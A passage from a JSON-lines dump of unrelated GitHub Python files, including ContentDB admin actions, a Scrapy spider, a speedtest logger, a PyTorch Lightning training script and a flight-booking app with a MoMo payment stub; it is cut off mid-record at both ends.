User.query.filter(User.maintained_packages.any(\n\t\t\tPackage.update_config.has(PackageUpdateConfig.outdated_at.isnot(None))))\n\tsystem_user = get_system_user()\n\tfor user in users:\n\t\tpackages = db.session.query(Package.title).filter(\n\t\t\t\tPackage.maintainers.contains(user),\n\t\t\t\tPackage.update_config.has(PackageUpdateConfig.outdated_at.isnot(None))) \\\n\t\t\t.all()\n\n\t\tpackages = [pkg[0] for pkg in packages]\n\t\tpackages_list = _package_list(packages)\n\n\t\tadd_notification(user, system_user, NotificationType.PACKAGE_APPROVAL,\n\t\t\t\tf\"The following packages may be outdated: {packages_list}\",\n\t\t\t\t\t\t url_for('todo.view_user', username=user.username))\n\n\tdb.session.commit()\n\n\n@action(\"Import licenses from SPDX\")\ndef import_licenses():\n\trenames = {\n\t\t\"GPLv2\": \"GPL-2.0-only\",\n\t\t\"GPLv3\": \"GPL-3.0-only\",\n\t\t\"AGPLv2\": \"AGPL-2.0-only\",\n\t\t\"AGPLv3\": \"AGPL-3.0-only\",\n\t\t\"LGPLv2.1\": \"LGPL-2.1-only\",\n\t\t\"LGPLv3\": \"LGPL-3.0-only\",\n\t\t\"Apache 2.0\": \"Apache-2.0\",\n\t\t\"BSD 2-Clause / FreeBSD\": \"BSD-2-Clause-FreeBSD\",\n\t\t\"BSD 3-Clause\": \"BSD-3-Clause\",\n\t\t\"CC0\": \"CC0-1.0\",\n\t\t\"CC BY 3.0\": \"CC-BY-3.0\",\n\t\t\"CC BY 4.0\": \"CC-BY-4.0\",\n\t\t\"CC BY-NC-SA 3.0\": \"CC-BY-NC-SA-3.0\",\n\t\t\"CC BY-SA 3.0\": \"CC-BY-SA-3.0\",\n\t\t\"CC BY-SA 4.0\": \"CC-BY-SA-4.0\",\n\t\t\"NPOSLv3\": \"NPOSL-3.0\",\n\t\t\"MPL 2.0\": \"MPL-2.0\",\n\t\t\"EUPLv1.2\": \"EUPL-1.2\",\n\t\t\"SIL Open Font License v1.1\": \"OFL-1.1\",\n\t}\n\n\tfor old_name, new_name in renames.items():\n\t\tLicense.query.filter_by(name=old_name).update({ \"name\": new_name })\n\n\tr = requests.get(\n\t\t\t\"https://raw.githubusercontent.com/spdx/license-list-data/master/json/licenses.json\")\n\tlicenses = r.json()[\"licenses\"]\n\n\texisting_licenses = {}\n\tfor license_data in License.query.all():\n\t\tassert license_data.name not in renames.keys()\n\t\texisting_licenses[license_data.name.lower()] = license_data\n\n\tfor license_data in licenses:\n\t\tobj = existing_licenses.get(license_data[\"licenseId\"].lower())\n\t\tif obj:\n\t\t\tobj.url = license_data[\"reference\"]\n\t\telif license_data.get(\"isOsiApproved\") and license_data.get(\"isFsfLibre\") and not license_data[\"isDeprecatedLicenseId\"]:\n\t\t\tobj = License(license_data[\"licenseId\"], True, license_data[\"reference\"])\n\t\t\tdb.session.add(obj)\n\n\tdb.session.commit()\n\n\n@action(\"Delete inactive users\")\ndef delete_inactive_users():\n\tusers = User.query.filter(User.is_active == False, ~User.packages.any(), ~User.forum_topics.any(),\n\t\t\tUser.rank == UserRank.NOT_JOINED).all()\n\tfor user in users:\n\t\tdb.session.delete(user)\n\tdb.session.commit()\n\n\n@action(\"Send Video URL notification\")\ndef remind_video_url():\n\tusers = User.query.filter(User.maintained_packages.any(\n\t\t\tand_(Package.video_url == None, Package.type == PackageType.GAME, Package.state == PackageState.APPROVED)))\n\tsystem_user = get_system_user()\n\tfor user in users:\n\t\tpackages = db.session.query(Package.title).filter(\n\t\t\t\tor_(Package.author == user, Package.maintainers.contains(user)),\n\t\t\t\tPackage.video_url == None,\n\t\t\t\tPackage.type == PackageType.GAME,\n\t\t\t\tPackage.state == PackageState.APPROVED) \\\n\t\t\t.all()\n\n\t\tpackages = [pkg[0] for pkg in packages]\n\t\tpackages_list = _package_list(packages)\n\n\t\tadd_notification(user, system_user, NotificationType.PACKAGE_APPROVAL,\n\t\t\t\tf\"You should add a video to {packages_list}\",\n\t\t\t\t\t\t url_for('users.profile', username=user.username))\n\n\tdb.session.commit()\n\n\n@action(\"Send missing game support notifications\")\ndef remind_missing_game_support():\n\tusers = User.query.filter(\n\t\tUser.maintained_packages.any(and_(\n\t\t\tPackage.state != PackageState.DELETED,\n\t\t\tPackage.type.in_([PackageType.MOD, PackageType.TXP]),\n\t\t\t~Package.supported_games.any(),\n\t\t\tPackage.supports_all_games == False))).all()\n\n\tsystem_user = get_system_user()\n\tfor user in users:\n\t\tpackages = db.session.query(Package.title).filter(\n\t\t\tPackage.maintainers.contains(user),\n\t\t\tPackage.state != PackageState.DELETED,\n\t\t\tPackage.type.in_([PackageType.MOD, PackageType.TXP]),\n\t\t\t~Package.supported_games.any(),\n\t\t\tPackage.supports_all_games == False) \\\n\t\t\t.all()\n\n\t\tpackages = [pkg[0] for pkg in packages]\n\t\tpackages_list = _package_list(packages)\n\n\t\tadd_notification(user, system_user, NotificationType.PACKAGE_APPROVAL,\n\t\t\t\tf\"You need to confirm whether the following packages support all games: {packages_list}\",\n\t\t\t\turl_for('todo.all_game_support', username=user.username))\n\n\tdb.session.commit()\n\n\n@action(\"Detect game support\")\ndef detect_game_support():\n\ttask_id = uuid()\n\tupdate_all_game_support.apply_async((), task_id=task_id)\n\treturn redirect(url_for(\"tasks.check\", id=task_id, r=url_for(\"admin.admin_page\")))\n\n\n@action(\"Send pending notif digests\")\ndef do_send_pending_digests():\n\tsend_pending_digests.delay()\n\n\n@action(\"DANGER: Delete removed packages\")\ndef del_removed_packages():\n\tquery = Package.query.filter_by(state=PackageState.DELETED)\n\tcount = query.count()\n\tfor pkg in query.all():\n\t\tpkg.review_thread = None\n\t\tdb.session.delete(pkg)\n\tdb.session.commit()\n\n\tflash(\"Deleted {} soft deleted packages packages\".format(count), \"success\")\n\treturn redirect(url_for(\"admin.admin_page\"))\n\n\n@action(\"DANGER: Check all releases (postReleaseCheckUpdate)\")\ndef check_releases():\n\treleases = PackageRelease.query.filter(PackageRelease.url.like(\"/uploads/%\")).all()\n\n\ttasks = []\n\tfor release in releases:\n\t\ttasks.append(check_zip_release.s(release.id, release.file_path))\n\n\tresult = group(tasks).apply_async()\n\n\twhile not result.ready():\n\t\timport time\n\t\ttime.sleep(0.1)\n\n\treturn redirect(url_for(\"todo.view_editor\"))\n\n\n@action(\"DANGER: Check latest release of all packages (postReleaseCheckUpdate)\")\ndef reimport_packages():\n\ttasks = []\n\tfor package in Package.query.filter(Package.state != PackageState.DELETED).all():\n\t\trelease = package.releases.first()\n\t\tif release:\n\t\t\ttasks.append(check_zip_release.s(release.id, release.file_path))\n\n\tresult = group(tasks).apply_async()\n\n\twhile not result.ready():\n\t\timport time\n\t\ttime.sleep(0.1)\n\n\treturn redirect(url_for(\"todo.view_editor\"))\n\n\n@action(\"DANGER: Import screenshots from Git\")\ndef import_screenshots():\n\tpackages = Package.query \\\n\t\t.filter(Package.state != PackageState.DELETED) \\\n\t\t.outerjoin(PackageScreenshot, Package.id == PackageScreenshot.package_id) \\\n\t\t.filter(PackageScreenshot.id == None) \\\n\t\t.all()\n\tfor package in packages:\n\t\timport_repo_screenshot.delay(package.id)\n\n\treturn redirect(url_for(\"admin.admin_page\"))\n","repo_name":"minetest/contentdb","sub_path":"app/blueprints/admin/actions.py","file_name":"actions.py","file_ext":"py","file_size_in_byte":10450,"program_lang":"python","lang":"en","doc_type":"code","stars":83,"dataset":"github-code","pt":"50"} +{"seq_id":"30211862014","text":"import mysql.connector\nfrom mysql.connector import errorcode\nimport db.database_config as db\nfrom util import get_first\n\nDB_NAME = db.get_db_name()\nTABLES = {}\n\nTABLES['id_queue'] = (\n \"CREATE TABLE `id_queue` (\"\n \" `uid` int(11) NOT NULL AUTO_INCREMENT,\"\n \" `id` varchar(128) NOT NULL,\"\n \" `next_id` varchar(128) NOT NULL,\"\n \" `count` int(11) NOT NULL DEFAULT 0,\"\n \" `area` int(11) NOT NULL DEFAULT 0,\"\n \" `next_area` int(11) NOT NULL DEFAULT 0,\"\n \" PRIMARY KEY (`uid`)\"\n \") ENGINE=InnoDB\")\n\nTABLES['detail'] = (\n \"CREATE TABLE `detail` (\"\n \" `uid` int(11) NOT NULL AUTO_INCREMENT,\"\n \" `id` varchar(128) NOT NULL,\"\n \" `detail` text(30000) NOT NULL,\"\n \" PRIMARY KEY (`uid`)\"\n \") ENGINE=InnoDB\")\n\n\nclass Db:\n def __init__(self):\n '''\n 初始化,连接并创建数据库、表\n '''\n self.cnx = mysql.connector.connect(user='root', host=db.get_host(), password=db.get_password())\n self.cursor = self.cnx.cursor()\n try:\n self.cnx.database = DB_NAME\n except Exception as err:\n if err.errno == errorcode.ER_BAD_DB_ERROR:\n try:\n self.cursor.execute(\n \"CREATE DATABASE {} DEFAULT CHARACTER SET 'utf8'\".format(DB_NAME)\n )\n except mysql.connector.Error as err:\n print('Fail to create database: {}'.format(DB_NAME))\n exit(-1)\n self.cnx.database = DB_NAME\n else:\n print(err)\n exit(-1)\n # 数据表\n for name, ddl in TABLES.items():\n try:\n print(\"Creating table {}: \".format(name), end='')\n self.cursor.execute(ddl)\n except mysql.connector.Error as err:\n if err.errno == errorcode.ER_TABLE_EXISTS_ERROR:\n print(\"table {} already exists.\".format(name))\n else:\n print(err.msg)\n else:\n print(\"all tables was be established\")\n\n def insert_first(self):\n # alter table id_queue AUTO_INCREMENT = 1\n self.cursor.execute(\"select count(*) from id_queue\")\n count = self.cursor.fetchone()[0]\n if(count == 0):\n first = get_first()\n add_first = (\"INSERT INTO id_queue\"\n \"(id, next_id, count, area, next_area)\"\n \"VALUES (%s, %s, %s, %s, %s)\")\n self.cursor.execute(add_first, (first.get('id'), first.get('next_id'), first.get('count'), first.get('area'), first.get('next_area')))\n self.cnx.commit()\n else:\n pass\n\n def insert_id(self, id, next_id, count, area, next_area):\n # sql语句\n add_id = (\"INSERT INTO id_queue\"\n \"(id, next_id, count, area, next_area)\"\n \"VALUES (%s, %s, %s, %s, %s)\")\n self.cursor.execute(add_id, (id, next_id, count, area, next_area))\n self.cnx.commit()\n\n def insert_detail(self, id, detail):\n add_detail = (\"INSERT INTO detail\"\n \"(id, detail)\"\n \"VALUES (%s, %s)\")\n self.cursor.execute(add_detail, (id, detail))\n self.cnx.commit()\n\n def fetch_last_one(self):\n query_last_id = ('select * from id_queue order by uid desc limit 1')\n self.cursor.execute(query_last_id)\n return self.cursor.fetchone()\n\n def alter_count(self):\n '''\n 修改最后一条字段的count\n UPDATE id_queue set count=new_count WHERE 1 ORDER BY uid DESC LIMIT 1\n :return:\n '''\n first = get_first()\n query = \"UPDATE id_queue set `count`=(%s) WHERE 1 ORDER BY uid DESC LIMIT 1\"\n self.cursor.execute(query, (first.get('count'),))\n self.cnx.commit()\n\n def get_now_count(self):\n self.cursor.execute(\"select count(*) from id_queue\")\n return self.cursor.fetchone()[0]\n","repo_name":"hanyang-sh/itslaw","sub_path":"db/create_database.py","file_name":"create_database.py","file_ext":"py","file_size_in_byte":3976,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"40809563546","text":"import os\nimport subprocess\ndirectory = '/home/hxianglong/Projects/Hbnn-100'\nscreen = 'exp 2'\nenv = 'Hbnn'\nexperiment = 'test.py'\n# subprocess.Popen('cd %s'%directory, shell=True)\n# subprocess.Popen()\n# bash = os.system()\n# bash('bash -c \\'cd %s\\'' % directory)\n# bash('bash -c \\'screen -r %s\\'' % screen)\n# bash('bash -c \\'source activate %s\\'' % env)\nos.system('bash -c \\'cd %s\\'' % directory)\nos.system('bash -c \\'screen -r %s\\'' % screen)\nos.system('bash -c \\'source activate %s\\'' % env)\n# bash('bash -c \\'python %s |& tee %s\\'' % (experiment, experiment))\nsubprocess.Popen('python %s |& tee %s' % (experiment, experiment), shell=True)\n\n# bash('bash -c \\'screen -R %s\\'' % directory)\n","repo_name":"wangboyu-langya/Hierarchical-Bayesian-Neural-Network","sub_path":"sp.py","file_name":"sp.py","file_ext":"py","file_size_in_byte":689,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"50"} +{"seq_id":"72698061594","text":"from RosENet.preprocessing.step import Step\nimport RosENet.rosetta.rosetta as rosetta\n\nclass MakeLigandParamsPDB(metaclass=Step):\n \"\"\"Preprocessing step that create the ligand.params and ligand.pdb files at\n the beginning of the pipeline.\"\"\"\n\n @classmethod\n def files(cls, pdb_object):\n \"\"\"List of files being created\n\n pdb_object : PDBObject\n PDB structure being handled\n \"\"\"\n return [pdb_object.ligand.params,\n pdb_object.ligand.pdb]\n\n @classmethod\n def _run(cls, pdb_object):\n \"\"\"Inner function for the preprocessing step.\n\n pdb_object : PDBObject\n PDB structure being handled\n \"\"\"\n ligand_mol2_path = pdb_object.ligand.mol2.path\n params_filename = ligand_mol2_path.stem\n working_directory = ligand_mol2_path.parent\n return rosetta.molfile_to_params(\n working_directory = working_directory,\n output_path = params_filename,\n input_path = ligand_mol2_path)\n\n","repo_name":"DS3Lab/RosENet","sub_path":"RosENet/preprocessing/make_ligand_params_pdb.py","file_name":"make_ligand_params_pdb.py","file_ext":"py","file_size_in_byte":1036,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"50"} +{"seq_id":"8624289207","text":"from datetime import date\n\nfrom sqlalchemy import Column, String, Integer, Date, Numeric\nfrom base import session_factory, Base\n\n\nclass Person(Base):\n __tablename__ = 'person'\n\n id = Column(Integer, primary_key=True)\n name = Column(String)\n date_of_birth = Column(Date)\n height = Column(Integer)\n weight = Column(Numeric)\n\n def __init__(self, name, date_of_birth, height, weight):\n self.name = name\n self.date_of_birth = date_of_birth\n self.height = height\n self.weight = weight\n\ndef create_people():\n session = session_factory()\n bruno = Person(\"Bruno Krebs\", date(1984, 10, 20), 182, 84.5)\n john = Person(\"John Doe\", date(1990, 5, 17), 173, 90)\n session.add(bruno)\n session.add(john)\n session.commit()\n session.close()\n\n\ndef get_people():\n session = session_factory()\n people_query = session.query(Person)\n session.close()\n return people_query.all()\n\n\nif __name__ == \"__main__\":\n people = get_people()\n if len(people) == 0:\n create_people()\n people = get_people()\n\n for person in people:\n print('{} was born in {}'.format(person.name, person.date_of_birth))\n","repo_name":"sistemocl/grafana_middleware","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1168,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"28492174637","text":"from sklearn.model_selection import train_test_split\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.datasets import load_iris\nimport matplotlib.pyplot as plt\n\niris = load_iris()\n\ntrain_X,test_X,train_y,test_y = train_test_split(iris.data,iris.target,stratify=iris.target,random_state=42)\n\nX = []\nY = []\n\nfor k in range(1,101,2):\n model = KNeighborsClassifier(n_neighbors=k)\n model.fit(train_X,train_y)\n model.predict(test_X)\n Y.append(model.score(test_X,test_y))\n X.append(k)\n\nplt.ylim(0, 1)\nplt.grid(True)\nplt.plot(X,Y)\n#plt.show()\nplt.savefig('Fig1.png')\n","repo_name":"ei1704/NT-WorkSpace","sub_path":"20/20_4.py","file_name":"20_4.py","file_ext":"py","file_size_in_byte":579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"37632614409","text":"import scrapy\n\nclass QuotesSpider(scrapy.Spider):\n\tname = \"quotes\"\n\n\tdef start_requests(self):\n\t\turls = [\n\t\t\t'https://quotes.toscrape.com/page/1/'\n\t\t]\n\n\t\t# Generator function\n\t\tfor u in urls:\n\t\t\tyield scrapy.Request(url=u, callback = self.parse)\n\n\n\tdef parse(self, response):\n\t\t# page_no = response.url.split('/')[-2]\n\t\t# filename = \"quotes-{}.html\".format(page_no)\n\n\t\t# with open(filename, 'wb') as f:\n\t\t# \tf.write(response.body)\n\n\t\t# self.log(\"saved file \"+ filename)\n\n\t\tall_quotes = response.css('div.quote')\n\n\t\tfor quote in all_quotes:\n\t\t\ttitle = quote.css('span.text::text').get()\n\t\t\tauthor = quote.css('small.author::text').get()\n\t\t\ttags = quote.css('a.tag::text').getall()\n\n\t\t\tresult = {\n\t\t\t\t'text' : title,\n\t\t\t\t'author': author,\n\t\t\t\t'tags' : tags\n\t\t\t} \n\n\t\t\tyield result\n\n\t\t\tnext_page = response.css('li.next a::attr(href)').get()\n\n\t\t\tif next_page is not None:\n\t\t\t\tnext_page = response.urljoin(next_page)\n\t\t\t\tyield scrapy.Request(url=next_page, callback = self.parse)\n\n\n\n\n\n\n\n\n","repo_name":"coding-minutes/python-data-science-mastercourse","sub_path":"10 Web crawling - scrapy/quotescrawler/quotescrawler/spiders/quotes_spider.py","file_name":"quotes_spider.py","file_ext":"py","file_size_in_byte":983,"program_lang":"python","lang":"en","doc_type":"code","stars":36,"dataset":"github-code","pt":"50"} +{"seq_id":"2396186014","text":"#!/usr/bin/env python3\n\nimport datetime\nimport json\nimport os\nimport subprocess\nimport time\nimport sys\nfrom influxdb import InfluxDBClient\nimport influxdb.exceptions\n\n# Variables\ninfluxdb_host = os.getenv(\"INFLUXDB_HOST\", \"localhost\")\ninfluxdb_port = int(os.getenv(\"INFLUXDB_PORT\", 8086))\ninfluxdb_user = os.getenv(\"INFLUXDB_USER\")\ninfluxdb_pass = os.getenv(\"INFLUXDB_PASS\")\ninfluxdb_db = os.getenv(\"INFLUXDB_DB\")\nsleepy_time = int(os.getenv(\"SLEEPY_TIME\", 3600))\nstart_time = datetime.datetime.utcnow().isoformat()\n\n# Some logging\nprint(\"#####\\nScript starting!\\n#####\")\nprint(\"STATE: Starting at\", start_time)\nprint(\"STATE: Sleep time between runs set to\", sleepy_time, \"seconds\")\n\n\ndef loop():\n current_time = datetime.datetime.utcnow().isoformat()\n print(\"STATE: Loop running at\", current_time)\n\n # Run Speedtest\n print(\"STATE: Speedtest running\")\n my_speed = subprocess.run(['/usr/bin/speedtest', '--accept-license', '--accept-gdpr', '--format=json'], stdout=subprocess.PIPE, text=True, check=True)\n\n # Convert the string into JSON, only getting the stdout and stripping the first/last characters\n my_json = json.loads(my_speed.stdout.strip())\n\n # Get the values from JSON and log them to the Docker logs\n speed_down = my_json[\"download\"][\"bandwidth\"]\n speed_up = my_json[\"upload\"][\"bandwidth\"]\n ping_latency = my_json[\"ping\"][\"latency\"]\n ping_jitter = my_json[\"ping\"][\"jitter\"]\n timestamp = my_json[\"timestamp\"]\n result_url = my_json[\"result\"][\"url\"]\n\n print(\"STATE: Your download is\", speed_down, \"bps\")\n print(\"STATE: Your upload is\", speed_up, \"bps\")\n print(\"STATE: Your ping latency is\", ping_latency, \"ms\")\n print(\"STATE: Your ping jitter is\", ping_jitter, \"ms\")\n print(\"STATE: Your URL is\", result_url, \" --- This is not saved to InfluxDB\")\n\n # Create a JSON file to send to InfluxDB\n json_body = [\n {\n \"measurement\": \"speedtest\",\n \"tags\": {\n \"service\": \"speedtest\"\n },\n \"time\": timestamp,\n \"fields\": {\n \"download\": speed_down,\n \"upload\": speed_up,\n \"ping_latency\": ping_latency,\n \"ping_jitter\": ping_jitter\n }\n }\n ]\n\n # Instantiate the connection\n print(\"STATE: Connecting to InfluxDB...\")\n client = InfluxDBClient(host=influxdb_host, port=influxdb_port, username=influxdb_user, password=influxdb_pass, database=influxdb_db, timeout=15)\n\n # Try to connect\n try:\n result = client.ping()\n print(\"STATE: Connected to InfluxDB successfully - version is\", result)\n print(\"STATE: Writing to database\")\n client.write_points(json_body)\n except influxdb.exceptions.InfluxDBClientError as err:\n print(\"ERROR: Error with client\")\n print(err)\n sys.exit(1)\n except influxdb.exceptions.InfluxDBServerError as err:\n print(\"ERROR: Error with server\")\n print(err)\n sys.exit(1)\n except Exception as err:\n print(err)\n\n print(\"STATE: Sleeping for\", sleepy_time, \"seconds\")\n time.sleep(sleepy_time)\n\n\nwhile True:\n loop()\n","repo_name":"loganmarchione/docker-speedtest-influxdb","sub_path":"speedtest.py","file_name":"speedtest.py","file_ext":"py","file_size_in_byte":3144,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"26981997877","text":"#!/usr/bin/python3\n\n##########################\ndef allow_import():\n import os\n import sys\n import inspect\n\n currentdir = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))\n parentdir = os.path.dirname(currentdir)\n sys.path.insert(0, parentdir)\n\nallow_import()\n##########################\n\nimport os\n#os.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0, 1, 2, 3\"\n#os.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0, 1, 2, 3\"\n\nimport argparse\nimport warnings\nimport pytorch_lightning as pl\nfrom pytorch_lightning.callbacks import ModelCheckpoint\nfrom pytorch_lightning.loggers import WandbLogger\nfrom pytorch_lightning.strategies.ddp import DDPStrategy\n\n# DieHardNET packages\nfrom pytorch_scripts.utils import *\nfrom pytorch_scripts.LightningModelWrapper import UpdateNormStatsCallback\nfrom pytorch_scripts.data_module import DataModule\n\n# Suppress the annoying warning for non-empty checkpoint directory\nwarnings.filterwarnings(\"ignore\")\n\nconfig_parser = parser = argparse.ArgumentParser(description='Configuration', add_help=False)\nparser.add_argument('-c', '--config', default='', type=str, metavar='FILE',\n help='YAML config file specifying default arguments.')\n\nparser = argparse.ArgumentParser(description='PyTorch Training')\n\n\n# General\nparser.add_argument('--name', type=str, default='test', help='Experiment name.')\nparser.add_argument('--mode', type=str, default='train', help='Mode: train/training or validation/validate.')\nparser.add_argument('--ckpt', type=str, default=None, help='Pass the name of a checkpoint to resume training.')\nparser.add_argument('--dataset', type=str, default='cifar10', help='Dataset name: cifar10 or cifar100.')\nparser.add_argument('--size', type=int, default=224, help='Image size.')\nparser.add_argument('--precision', type=int, default=16, help='Whether to use Mixed Precision or not.')\nparser.add_argument('--data_dir', type=str, default=None, help='Path to dataset.')\nparser.add_argument('--num_gpus', type=int, default=1, help='Number of GPUs.')\n\n# Model\nparser.add_argument('--model', type=str, default='resnet20', help='Network name. Resnets only for now.')\nparser.add_argument('--model_clip', type=bool, default=False, help='Whether to clip layer outputs or not.')\nparser.add_argument('--nan', type=bool, default=False, help='Whether to convert NaNs to 0 or not.')\nparser.add_argument('--freeze', type=bool, default=False, help='Whether to freeze all layer but BN in the first epoch or not.')\nparser.add_argument('--pretrained', type=bool, default=False, help='Whether to start from pretrained weights or not.')\nparser.add_argument('--activation', type=str, default='max', help='Which variant of RobustActivation to use (select deeplab_relumax to use)', choices=['max', 'mean_std', 'median_iqr'])\n\n# Optimization\nparser.add_argument('--loss', type=str, default='bce', help='Loss: bce, ce or sce.')\nparser.add_argument('--grad_clip', default=None, help='Gradient clipping value.')\nparser.add_argument('--epochs', type=int, default=150, help='Number of epochs.')\nparser.add_argument('--batch_size', type=int, default=128, help='Batch Size')\nparser.add_argument('--lr', type=float, default=1e-1, help='Learning rate.')\nparser.add_argument('--scheduler', type=str, default='cosine', help='Scheduler name: cosine, poly')\nparser.add_argument('--lr_min', type=float, default=1e-1, help='Minimum learning rate.')\nparser.add_argument('--optimizer', type=str, default='sgd', help='Optimizer name: adamw or sgd.')\n\n# Injection\nparser.add_argument('--error_model', type=str, default='random', help='Optimizer name: adamw or sgd.')\nparser.add_argument('--inject_p', type=float, default=0.1, help='Probability of noise injection at training time.')\nparser.add_argument('--inject_epoch', type=float, default=0, help='How many epochs before starting the injection.')\n\n# Augmentations and Regularisations\nparser.add_argument('--wd', type=float, default=1e-4, help='Weight Decay.')\nparser.add_argument('--rcc', type=float, default=0.75, help='RCC lower bound.')\nparser.add_argument('--rand_aug', type=str, default=None, help='RandAugment magnitude and std.')\nparser.add_argument('--rand_erasing', type=float, default=0.0, help='Random Erasing propability.')\nparser.add_argument('--mixup_cutmix', type=bool, default=False, help='Whether to use mixup/cutmix or not.')\nparser.add_argument('--jitter', type=float, default=0.0, help='Color jitter.')\nparser.add_argument('--label_smooth', type=float, default=0.0, help='Label Smoothing.')\n\n\n# Others\nparser.add_argument('--seed', default=0, help='Random seed for reproducibility.')\nparser.add_argument('--comment', default='', help='Optional comment.')\n\nn_classes = {'cifar10': 10, 'cifar100': 100, 'ImageNet': 1000, 'cityscapes': 19}\n\ndef main():\n args = parse_args(parser, config_parser)\n\n # Set random seed\n pl.seed_everything(args.seed, workers=True)\n\n augs = {'rand_aug': args.rand_aug, 'rand_erasing': args.rand_erasing, 'mixup_cutmix': args.mixup_cutmix,\n 'jitter': args.jitter, 'label_smooth': args.label_smooth, 'rcc': args.rcc}\n\n root = args.data_dir or get_default_data_root()\n datamodule = DataModule(args.dataset, root, args.batch_size, args.num_gpus,\n size=args.size, augs=augs, fp16=args.precision)\n\n # Build model (ResNet or EfficientNet only up to now)\n optim_params = {'optimizer': args.optimizer, 'epochs': args.epochs, 'lr': args.lr, 'lr_min': args.lr_min,\n 'wd': args.wd, 'scheduler': args.scheduler}\n net = build_model(args.model, n_classes[args.dataset], optim_params, args.loss, args.error_model, args.inject_p,\n args.inject_epoch, args.model_clip, args.nan, args.freeze, args.pretrained, args.activation)\n\n # W&B logger\n wandb_logger = WandbLogger(project=\"NeutronRobustness\", name=args.name, entity=\"pathselector\")\n wandb_logger.log_hyperparams(args)\n wandb_logger.watch(net, log_graph=False)\n\n # Callbacks\n filename_quantity = '-{epoch:02d}-{val_acc:.2f}'\n #monitored_quantity, monitored_mode = 'val_acc', 'max'\n\n if args.dataset == 'cityscapes':\n filename_quantity = '-{epoch:02d}-{val_miou:.4f}'\n #monitored_quantity, monitored_mode = 'noisy_val_miou', 'max'\n\n ckpt_callback = ModelCheckpoint('checkpoints/', \n filename=args.name + filename_quantity,\n save_last=False)\n #stats_callback = UpdateNormStatsCallback()\n callbacks = [ckpt_callback]\n\n # Pytorch-Lightning Trainer\n trainer = pl.Trainer(max_epochs=args.epochs, devices=args.num_gpus, callbacks=callbacks, logger=wandb_logger, log_every_n_steps=1,\n deterministic='warn', benchmark=True, accelerator='gpu', sync_batchnorm=True,\n gradient_clip_val=args.grad_clip, strategy=DDPStrategy(find_unused_parameters=False),\n precision=args.precision, auto_select_gpus=False)\n\n #if args.ckpt:\n # #args.ckpt = '~/Dropbox/DieHardNet/Checkpoints/' + args.ckpt\n # args.ckpt = 'checkpoints/' + args.ckpt\n if args.mode == 'train' or args.mode == 'training':\n trainer.fit(net, datamodule, ckpt_path=args.ckpt)\n trainer.test(net, datamodule, ckpt_path=args.ckpt)\n elif args.mode == 'validation' or args.mode == 'validate':\n trainer.validate(net, datamodule, ckpt_path=args.ckpt)\n elif args.mode == 'test' or args.mode == 'testing':\n trainer.test(net, datamodule, ckpt_path=args.ckpt)\n else:\n print('ERROR: select a suitable mode \"train/training\" or \"validation/validate\".')\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"iurada/robust-segmentation","sub_path":"training/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7646,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"10417792908","text":"from tokenize import String\n\nfrom app import app, db\nimport os\nimport hashlib,uuid, hmac,json, urllib\nfrom app.models import ChuyenBay, KhachHang\n\n\ndef read_chuyenbay(San_Bay_Di_id=0,San_Bay_Den_id=0,San_Bay_Di=None,San_Bay_Den=None):\n chuyenbay= ChuyenBay.query.filter().all()\n cacchuyenbay = []\n if San_Bay_Di_id > 0:\n chuyenbay = [p for p in chuyenbay if p[\"San_Bay_Di_id\"] == San_Bay_Di_id]\n if San_Bay_Den_id > 0:\n chuyenbay = [p for p in chuyenbay if p[\"San_Bay_Den_id\"] == San_Bay_Den_id]\n if San_Bay_Di and San_Bay_Den:\n chuyenbay = ChuyenBay.query.filter().all()\n for i in range(0, len(chuyenbay)):\n if(San_Bay_Di == chuyenbay[i].San_Bay_Di.Ten_San_Bay and San_Bay_Den == chuyenbay[i].San_Bay_Den.Ten_San_Bay ):\n cacchuyenbay.append(chuyenbay[i])\n\n return cacchuyenbay[0]\n\n\n\n\ndef add_Khachhang(Quy_Danh = None, Ten_Khach_Hang = None, Dia_Chi = None, CMND =0, Email = None, SDT = 0, Ghi_Chu=None):\n p = KhachHang(\n Quy_Danh = Quy_Danh, Ten_Khach_Hang = Ten_Khach_Hang, Dia_Chi=Dia_Chi, CMND = CMND, Email = Email, SDT= SDT, Ghi_Chu = Ghi_Chu\n )\n db.session.add(p)\n db.session.commit()\n\n\n\ndef read_ChuyenBay_show(San_Bay_Di_id=0, San_Bay_Den_id=0, San_Bay_Di=None, San_Bay_Den=None, latest=False):\n q=ChuyenBay.query\n\n if San_Bay_Di:\n q= q.filter(ChuyenBay.name.contains(San_Bay_Di))\n if San_Bay_Den:\n q=q.filter(ChuyenBay.name.contains(San_Bay_Den))\n if latest:\n return q.all()[:5]\n return q.all()\n\n\ndef payment_momo():\n endpoint = \"https://test-payment.momo.vn/gw_payment/transactionProcessor\"\n partnerCode = \"MOMOY1ZA20200907\"\n accessKey = \"rVuWIV2U6YHmb803\"\n serectkey = \"EQeEkD4sirbclirmqPv5qXDrcLu2h5EZ\"\n orderInfo = \"pay with MoMo\"\n returnUrl = \"https://momo.vn/return\"\n notifyurl = \"https://dummy.url/notify\"\n amount = \"2000000\"\n orderId = str(uuid.uuid4())\n requestId = str(uuid.uuid4())\n requestType = \"captureMoMoWallet\"\n extraData = \"merchantName=;merchantId=\"\n rawSignature = \"partnerCode=\" + partnerCode + \"&accessKey=\" + accessKey + \"&requestId=\" + requestId + \"&amount=\" + amount + \"&orderId=\" + orderId + \"&orderInfo=\" + orderInfo + \"&returnUrl=\" + returnUrl + \"¬ifyUrl=\" + notifyurl + \"&extraData=\" + extraData\n\n h = hmac.new(serectkey.encode('utf-8'), rawSignature.encode('utf-8'), hashlib.sha256)\n signature = h.hexdigest()\n\n data = {\n 